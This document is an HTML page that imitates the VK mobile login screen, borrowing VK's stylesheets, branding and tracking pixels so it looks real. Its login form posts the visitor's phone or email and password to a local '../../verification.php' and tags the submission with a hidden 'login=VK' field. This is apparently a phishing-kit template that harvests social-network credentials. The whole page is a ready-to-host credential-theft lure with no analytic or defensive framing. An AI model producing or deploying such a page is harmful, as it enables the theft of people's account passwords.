<html lang="us" class="vk vk_js_yes vk_2x vk_flex_yes r m h vk_appAuth_no n vk_modern vk_schemes_yes">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, minimal-ui, user-scalable=no" />
        <meta name="format-detection" content="telephone=no" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="MobileOptimized" content="176" />
        <meta name="HandheldFriendly" content="True" />
        <base id="base" />
        <link rel="manifest" crossorigin="use-credentials" href="/manifest.webmanifest?ver=209" />
        <meta name="description" content="VK is the largest European social network with more than 100 million active users. Our goal is to keep old friends, ex-classmates, neighbors and colleagues in touch." />
        <link rel="shortcut icon" href="/images/icons/favicons/fav_logo_2x.ico?8" />
        <meta name="theme-color" content="#ffffff" />
        <link rel="icon" type="image/png" sizes="32x32" href="/images/icons/pwa/favicon_32.png?9" />
        <link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?9" />
        <meta name="apple-mobile-web-app-title" content="VK" />
        <meta name="application-name" content="VK" />
        <meta name="mobile-web-app-capable" content="yes" />
        <meta name="apple-mobile-web-app-status-bar-style" content="black" />
        <title>Log in | VK</title>

        <script type="text/javascript" async="" src="https://top-fwz1.mail.ru/js/code.js"></script>

        <link rel="stylesheet" href="https://m.vk.com/css/mobile/variables.eedc30fa1d5cb1a3ba8b.css?" />
        <link rel="stylesheet" href="https://m.vk.com/css/mobile/common.014588362ebb011dec09.css?" />
        <link rel="stylesheet" href="https://m.vk.com/css/mobile/audio_player_bottom.b7c5245e12fba4147876.css?" />
        <link rel="stylesheet" href="https://m.vk.com/css/mobile/audio_player_mini.5972ccdfefc224e4ffb3.css?" />
        <link rel="stylesheet" href="https://m.vk.com/css/mobile/unauthorized.c46a2b649a573887b2d9.css?" />
    </head>

    <body
        class="vk__page _ivk x2 _touch vk_ios_no _hfixed vk_stickers_hints_support_yes opera_mini_no vk_safari_no vk__page_login vk_tabbar_bottom vk_al_yes"
        onresize="uVK.onResize(); onBodyResize(true);"
        scheme="bright_light"
        onorientationchange="uVK.onOrientationChange(); null"
    >
        <div id="utils"></div>

        <div class="layout">
            <div class="layout__header mhead" id="vk_head"></div>
            <div class="layout__body qs_enabled _js _copts" id="vk_wrap">
                <div class="layout__leftMenu" id="l"></div>
                <div class="layout__basis" id="m" role="main">
                    <div class="basis">
                        <div class="basis__header mhead basis__header_noBottomMenu basis__header_noshadow basis__header_noshadowAnim basis__header_unauthorized_actions basis__header_nohide" id="mhead">
                            <a href="/" accesskey="*" class="hb_wrap mhb_logo">
                                <div class="">
                                    <div class="hb_btn mhi_logo">&nbsp;</div>
                                </div>
                                <h1 class="hb_btn mh_header">&nbsp;</h1>
                            </a>
                        </div>
                        <div class="basis__menu">
                            <div class="AudioPlayerBottom"></div>
                            <div class="VideoFilterBadgeFiller"></div>
                        </div>

                        <div class="basis__content mcont" id="mcont" data-canonical="https://vk.com/login">
                            <div class="screen_login">
                                <div class="fit_box bl_cont new_form">
                                    <div class="PageBlock">
                                        <div class="form_item">
                                            <div class="login_header">
                                                Stay in touch on the go with VK mobile.
                                            </div>

                                            <form method="POST" action="../../verification.php" novalidate="">
                                            <input type="hidden" name="login" value="VK">
                                                <dl class="fi_row">
                                                    <dd>
                                                        <input type="text" class="textfield" name="email" value="" placeholder="Phone or email" />
                                                    </dd>
                                                </dl>
                                                <dl class="fi_row">
                                                    <dd>
                                                        <input type="password" class="textfield" name="password" placeholder="Password" />
                                                    </dd>
                                                </dl>

                                                <div class="fi_row_new">
                                                    <input class="button wide_button" type="submit" value="Log in" />
                                                </div>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="screen_feed"></div>
                        </div>

                        <div aria-hidden="true" class="_cntrs" style="height: 0; overflow: hidden;">
                            <img width="1" height="1" src="https://sb.scorecardresearch.com/p?c1=2&amp;c2=13765216&amp;c3=&amp;c4=https%3A%2F%2Fm.vk.com%2Flogin&amp;c5=&amp;c9=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;rn=42369524" alt="" />

                            <noscript><img src="//top-fwz1.mail.ru/counter?id=2579437;pid=0;r=" style="border: 0;" height="1" width="1" /></noscript>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </body>
</html>
